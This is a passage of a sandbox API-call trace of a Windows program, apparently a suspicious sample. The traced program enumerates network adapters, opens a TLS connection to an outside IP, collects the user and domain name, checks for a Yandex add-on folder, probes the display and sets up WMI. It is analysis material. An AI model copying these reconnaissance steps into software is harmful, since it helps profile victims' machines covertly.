GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x43e89c*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x43e89c*=0x7ec) returned 0x6f [0259.409] LocalAlloc (uFlags=0x0, uBytes=0x7ec) returned 0x581fd8 [0259.409] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x581fd8, SizePointer=0x43e89c*=0x7ec | out: AdapterAddresses=0x581fd8*(Alignment=0xf00000178, Length=0x178, IfIndex=0xf, Next=0x5822a4, AdapterName="{2E4C7576-F100-4C39-A70C-5E6D4E6BF9B7}", FirstUnicastAddress=0x582218, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection #4", FriendlyName="Local Area Connection 4", PhysicalAddress=([0]=0x0, [1]=0x19, [2]=0x7a, [3]=0x46, [4]=0x53, [5]=0x4c, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0xf, ZoneIndices=([0]=0xf, [1]=0xf, [2]=0xf, [3]=0xf, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6000009000000, Dhcpv4Server.lpSockaddr=0x582150*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x27, [5]=0xbf, [6]=0xe, [7]=0x9e, [8]=0x0, [9]=0x26, [10]=0x67, [11]=0xd5, [12]=0xc6, [13]=0x31, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x12c89f1d, FirstDnsSuffix=0x0), SizePointer=0x43e89c*=0x7ec) returned 0x0 [0259.421] LocalFree (hMem=0x581fd8) returned 0x0 [0259.421] WSAConnect (in: s=0x344, name=0x26e4244*(sa_family=2, sin_port=0x1bb, sin_addr="104.26.13.31"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0260.515] closesocket (s=0x340) returned 0 [0260.541] EnumerateSecurityPackagesW (in: pcPackages=0x43e80c, ppPackageInfo=0x43e7a0 | out: pcPackages=0x43e80c, ppPackageInfo=0x43e7a0) returned 0x0 [0260.544] FreeContextBuffer (in: pvContextBuffer=0x581fd8 | out: pvContextBuffer=0x581fd8) returned 0x0 [0260.551] GetCurrentProcess () returned 0xffffffff [0260.552] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x43e5c8 | out: TokenHandle=0x43e5c8*=0x340) returned 1 [0260.554] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x26e5354, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x43e61c, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x26e69e4, ptsExpiry=0x43e5a0 | out: phCredential=0x26e69e4, ptsExpiry=0x43e5a0) returned 0x0 [0260.568] CloseHandle (hObject=0x340) returned 1 [0260.570] InitializeSecurityContextW (in: phCredential=0x43e5ec, phContext=0x0, pTargetName=0x26e4310, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x26e6be8, pOutput=0x26e6b80, pfContextAttr=0x26e5318, ptsExpiry=0x43e5e4 | out: phNewContext=0x26e6be8, pOutput=0x26e6b80, pfContextAttr=0x26e5318, ptsExpiry=0x43e5e4) returned 0x90312 [0260.571] FreeContextBuffer (in: pvContextBuffer=0x524e48 | out: pvContextBuffer=0x524e48) returned 0x0 [0260.573] send (s=0x344, buf=0x26e6bfc*, len=113, flags=0) returned 113 [0260.574] recv (in: s=0x344, buf=0x26e6bfc, len=5, flags=0 | out: buf=0x26e6bfc*) returned 5 [0270.942] recv (in: s=0x344, buf=0x26e6c01, len=91, flags=0 | out: buf=0x26e6c01*) returned 91 [0270.947] InitializeSecurityContextW (in: phCredential=0x43e548, phContext=0x43e538, pTargetName=0x26e4310, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x26e6dfc, Reserved2=0x0, phNewContext=0x26e6be8, pOutput=0x26e6e10, pfContextAttr=0x26e5318, ptsExpiry=0x43e540 | out: phNewContext=0x26e6be8, pOutput=0x26e6e10, pfContextAttr=0x26e5318, ptsExpiry=0x43e540) returned 0x90312 [0270.951] recv (in: s=0x344, buf=0x26e6ea0, len=5, flags=0 | out: buf=0x26e6ea0*) returned 5 [0270.951] recv (in: s=0x344, buf=0x26e6eb9, len=2908, flags=0 | out: buf=0x26e6eb9*) returned 923 [0270.952] recv (in: s=0x344, buf=0x26e7254, len=1985, flags=0 | out: buf=0x26e7254) returned -1 [0274.230] WSAEventSelect (s=0x344, hEventObject=0x0, lNetworkEvents=0) returned 0 [0274.230] ioctlsocket (in: s=0x344, cmd=-2147195266, argp=0x43e598 | out: argp=0x43e598) returned 0 [0274.230] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2714, dwLanguageId=0x0, lpBuffer=0x43e384, nSize=0x101, Arguments=0x0 | out: lpBuffer="A blocking operation was interrupted by a call to WSACancelBlockingCall.\r\n") returned 0x4a [0274.483] DeleteSecurityContext (phContext=0x26e6be8) returned 0x0 [0274.694] shutdown (s=0x344, how=2) returned 0 [0274.695] closesocket (s=0x344) returned 0 [0274.812] CoTaskMemAlloc (cb=0x20c) returned 0x58a930 [0274.812] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x58a930 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0274.816] CoTaskMemFree (pv=0x58a930) [0274.817] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x43e618, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local", lpFilePart=0x0) returned 0x20 [0274.817] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", nBufferLength=0x105, lpBuffer=0x43e6a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", lpFilePart=0x0) returned 0x2f [0274.817] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e8e4) returned 1 [0274.817] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\yandex\\yaaddon"), fInfoLevelId=0x0, lpFileInformation=0x43eba8 | out: lpFileInformation=0x43eba8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe39b9920, ftCreationTime.dwHighDateTime=0x1d80713, ftLastAccessTime.dwLowDateTime=0xe39b9920, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xe39b9920, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0274.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8e0) returned 1 [0274.818] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", nBufferLength=0x105, lpBuffer=0x43e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", lpFilePart=0x0) returned 0x2f [0274.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e91c) returned 1 [0274.818] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\yandex\\yaaddon"), fInfoLevelId=0x0, lpFileInformation=0x26ec048 | out: lpFileInformation=0x26ec048*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe39b9920, ftCreationTime.dwHighDateTime=0x1d80713, ftLastAccessTime.dwLowDateTime=0xe39b9920, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xe39b9920, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0274.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e918) returned 1 [0275.795] GdiplusStartup (in: token=0x29a5b0, input=0x43e0a8, output=0x43e0f8 | out: token=0x29a5b0, output=0x43e0f8) returned 0x0 [0275.824] GdipCreateFromHWND (hwnd=0x0, graphics=0x43eb94) returned 0x0 [0275.826] GdipGetDC (graphics=0x5332230, hdc=0x43eba4) returned 0x0 [0275.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gdi32", cchWideChar=5, lpMultiByteStr=0x43eb44, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gdi32O\x1d", lpUsedDefaultChar=0x0) returned 5 [0275.856] LoadLibraryA (lpLibFileName="gdi32") returned 0x77240000 [0275.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetDeviceCaps", cchWideChar=13, lpMultiByteStr=0x43eb3c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDeviceCapsQ\x1d", lpUsedDefaultChar=0x0) returned 13 [0275.873] GetProcAddress (hModule=0x77240000, lpProcName="GetDeviceCaps") returned 0x77254de0 [0275.941] GetDeviceCaps (hdc=0x2f01093b, index=10) returned 900 [0275.942] GetDeviceCaps (hdc=0x2f01093b, index=117) returned 900 [0275.943] GdipReleaseDC (graphics=0x5332230, hdc=0x2f01093b) returned 0x0 [0275.943] GdipDeleteGraphics (graphics=0x5332230) returned 0x0 [0275.945] GetSystemMetrics (nIndex=80) returned 1 [0275.951] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0xbc0b36, dwData=0x0) returned 1 [0275.954] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x43e964 | out: lpmi=0x43e964) returned 1 [0275.956] CreateDCW (pwszDriver="\\\\.\\DISPLAY1", pwszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0x4801093e [0275.961] GetDeviceCaps (hdc=0x4801093e, index=12) returned 32 [0275.961] GetDeviceCaps (hdc=0x4801093e, index=14) returned 1 [0275.961] DeleteDC (hdc=0x4801093e) returned 1 [0275.969] GetProcessWindowStation () returned 0x60 [0275.970] GetUserObjectInformationA (in: hObj=0x60, nIndex=1, pvInfo=0x2702ebc, nLength=0xc, lpnLengthNeeded=0x43eb34 | out: pvInfo=0x2702ebc, lpnLengthNeeded=0x43eb34) returned 1 [0275.970] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c4 [0276.687] CoCreateGuid (in: pguid=0x43dc64 | out: pguid=0x43dc64*(Data1=0x96274b2f, Data2=0xd984, Data3=0x4277, Data4=([0]=0x95, [1]=0x64, [2]=0x15, [3]=0xca, [4]=0x63, [5]=0x76, [6]=0xe9, [7]=0x65))) returned 0x0 [0276.851] CoTaskMemAlloc (cb=0x804) returned 0x5a9d70 [0276.851] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x5a9d70, nSize=0x43ec20 | out: lpNameBuffer="Q9IATRKPRH\\kEecfMwgj", nSize=0x43ec20) returned 0x1 [0276.852] CoTaskMemFree (pv=0x5a9d70) [0276.853] GetUserNameW (in: lpBuffer=0x43e9b0, pcbBuffer=0x43ec28 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x43ec28) returned 1 [0276.995] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x410 [0276.997] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e470 | out: ppv=0x43e470*=0x500344) returned 0x0 [0277.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x43d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0277.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll", cchWideChar=63, lpMultiByteStr=0x43dbe8, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll", lpUsedDefaultChar=0x0) returned 63 [0277.079] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll") returned 0x6c310000 [0277.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResetSecurity", cchWideChar=13, lpMultiByteStr=0x43dc1c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResetSecuritym@l6ðr_DþÓqøÞC", lpUsedDefaultChar=0x0) returned 13 [0277.085] GetProcAddress (hModule=0x6c310000, lpProcName="ResetSecurity") returned 0x6c317dd0 [0277.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetSecurity", cchWideChar=11, lpMultiByteStr=0x43dc1c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetSecurity", lpUsedDefaultChar=0x0) returned 11 [0277.097] GetProcAddress (hModule=0x6c310000, lpProcName="SetSecurity") returned 0x6c317e20 [0277.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServices", cchWideChar=18, lpMultiByteStr=0x43dc18, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServices@l6ðr_DþÓqøÞC", lpUsedDefaultChar=0x0) returned 18 [0277.108] GetProcAddress (hModule=0x6c310000, lpProcName="BlessIWbemServices") returned 0x6c316e70 [0277.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServicesObject", cchWideChar=24, lpMultiByteStr=0x43dc10, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServicesObject»m@l6ðr_DþÓqøÞC", lpUsedDefaultChar=0x0) returned 24 [0277.163] GetProcAddress (hModule=0x6c310000, lpProcName="BlessIWbemServicesObject") returned 0x6c316ed0 [0277.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyHandle", cchWideChar=17, lpMultiByteStr=0x43dc18, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyHandlem@l6ðr_DþÓqøÞC", lpUsedDefaultChar=0x0) returned 17 [0277.194] GetProcAddress (hModule=0x6c310000, lpProcName="GetPropertyHandle") returned 0x6c317820 [0277.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WritePropertyValue", cchWideChar=18, lpMultiByteStr=0x43dc18, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WritePropertyValue@l6ðr_DþÓqøÞC", lpUsedDefaultChar=0x0) returned 18 [0277.213] GetProcAddress (hModule=0x6c310000, lpProcName="WritePropertyValue") returned 0x6c317fa0 [0277.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x43dc24, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clonem@l6ðr_DþÓqøÞC", lpUsedDefaultChar=0x0) returned 5 [0277.229] GetProcAddress (hModule=0x6c310000, lpProcName="Clone") returned 0x6c316f30 [0277.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VerifyClientKey", cchWideChar=15, lpMultiByteStr=0x43dc18, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VerifyClientKey", lpUsedDefaultChar=0x0) returned 15 [0277.239] GetProcAddress (hModule=0x6c310000, lpProcName="VerifyClientKey") returned 0x6c317f20 [0277.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetQualifierSet", cchWideChar=15, lpMultiByteStr=0x43dc18, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetQualifierSet", lpUsedDefaultChar=0x0) returned 15 [0277.246] GetProcAddress (hModule=0x6c310000, lpProcName="GetQualifierSet") returned 0x6c3178e0 [0277.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Get", cchWideChar=3, lpMultiByteStr=0x43dc24, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Get", lpUsedDefaultChar=0x0) returned 3 [0277.248] GetProcAddress (hModule=0x6c310000, lpProcName="Get") returned 0x6c3175c0 [0277.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Put", cchWideChar=3, lpMultiByteStr=0x43dc24, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Put", lpUsedDefaultChar=0x0) returned 3 [0277.327] GetProcAddress (hModule=0x6c310000, lpProcName="Put") returned 0x6c317a00 [0277.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Delete", cchWideChar=6, lpMultiByteStr=0x43dc24, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Delete@l6ðr_DþÓqøÞC", lpUsedDefaultChar=0x0) returned 6 [0277.369] GetProcAddress (hModule=0x6c310000, lpProcName="Delete") returned 0x6c317300 [0277.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetNames", cchWideChar=8, lpMultiByteStr=0x43dc20, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetNames»m@l6ðr_DþÓqøÞC", lpUsedDefaultChar=0x0) returned 8 [0277.383] GetProcAddress (hModule=0x6c310000, lpProcName="GetNames") returned 0x6c3177c0 [0277.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginEnumeration", cchWideChar=16, lpMultiByteStr=0x43dc18, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginEnumeration»m@l6ðr_DþÓqøÞC", lpUsedDefaultChar=0x0) returned 16 [0277.409] GetProcAddress (hModule=0x6c310000, lpProcName="BeginEnumeration") returned 0x6c316e30 [0277.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Next", cchWideChar=4, lpMultiByteStr=0x43dc24, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Next»m@l6ðr_DþÓqøÞC", lpUsedDefaultChar=0x0) returned 4 [0277.426] GetProcAddress (hModule=0x6c310000, lpProcName="Next") returned 0x6c3179a0 [0277.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndEnumeration", cchWideChar=14, lpMultiByteStr=0x43dc1c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndEnumeration@l6ðr_DþÓqøÞC", lpUsedDefaultChar=0x0) returned 14 [0277.446] GetProcAddress (hModule=0x6c310000, lpProcName="EndEnumeration") returned 0x6c3173c0 [0277.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyQualifierSet", cchWideChar=23, lpMultiByteStr=0x43dc10, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyQualifierSet", lpUsedDefaultChar=0x0) returned 23 [0277.457] GetProcAddress (hModule=0x6c310000, lpProcName="GetPropertyQualifierSet") returned 0x6c3178b0 [0277.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x43dc24, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clonem@l6ðr_DþÓqøÞC", lpUsedDefaultChar=0x0) returned 5 [0277.474] GetProcAddress (hModule=0x6c310000, lpProcName="Clone") returned 0x6c316f30 [0277.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetObjectText", cchWideChar=13, lpMultiByteStr=0x43dc1c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetObjectTextm@l6ðr_DþÓqøÞC", lpUsedDefaultChar=0x0) returned 13 [0277.475] GetProcAddress (hModule=0x6c310000, lpProcName="GetObjectText") returned 0x6c3177f0 [0277.573] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x43dbd0 | out: phkResult=0x43dbd0*=0x434) returned 0x0 [0277.574] RegQueryValueExW (in: hKey=0x434, lpValueName="WMIDisableCOMSecurity", lpReserved=0x0, lpType=0x43dbec, lpData=0x0, lpcbData=0x43dbe8*=0x0 | out: lpType=0x43dbec*=0x0, lpData=0x0, lpcbData=0x43dbe8*=0x0) returned 0x2 [0277.574] RegCloseKey (hKey=0x434) returned 0x0 [0277.575] IUnknown:Release (This=0x500344) returned 0x0 [0277.593] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x43e0bc | out: lpiid=0x43e0bc) returned 0x0 [0277.595] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ddd8 | out: ppv=0x43ddd8*=0x596d08) returned 0x0 [0277.637] WbemDefPath:IUnknown:QueryInterface (in: This=0x596d08, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dff0 | out: ppvObject=0x43dff0*=0x0) returned 0x80004002 [0277.637] WbemDefPath:IClassFactory:CreateInstance (in: This=0x596d08, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dffc | out: ppvObject=0x43dffc*=0x5a8ed8) returned 0x0 [0277.637] WbemDefPath:IUnknown:Release (This=0x596d08) returned 0x0 [0277.638] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a8ed8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dc1c | out: ppvObject=0x43dc1c*=0x5a8ed8) returned 0x0 [0277.643] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a8ed8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43dbd0 | out: ppvObject=0x43dbd0*=0x0) returned 0x80004002 [0277.643] WbemDefPath:IUnknown:AddRef (This=0x5a8ed8) returned 0x3 [0277.643] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a8ed8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d52c | out: ppvObject=0x43d52c*=0x0) returned 0x80004002 [0277.643] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a8ed8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d4dc | out: ppvObject=0x43d4dc*=0x0) returned 0x80004002 [0277.643] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a8ed8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d4e8 | out: ppvObject=0x43d4e8*=0x596d18) returned 0x0 [0277.644] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x596d18, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d4f0 | out: pCid=0x43d4f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0277.644] WbemDefPath:IUnknown:Release (This=0x596d18) returned 0x3 [0277.644] CoGetContextToken (in: pToken=0x43d548 | out: pToken=0x43d548) returned 0x0 [0277.644] CoGetContextToken (in: pToken=0x43d95c | out: pToken=0x43d95c) returned 0x0 [0277.644] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a8ed8, 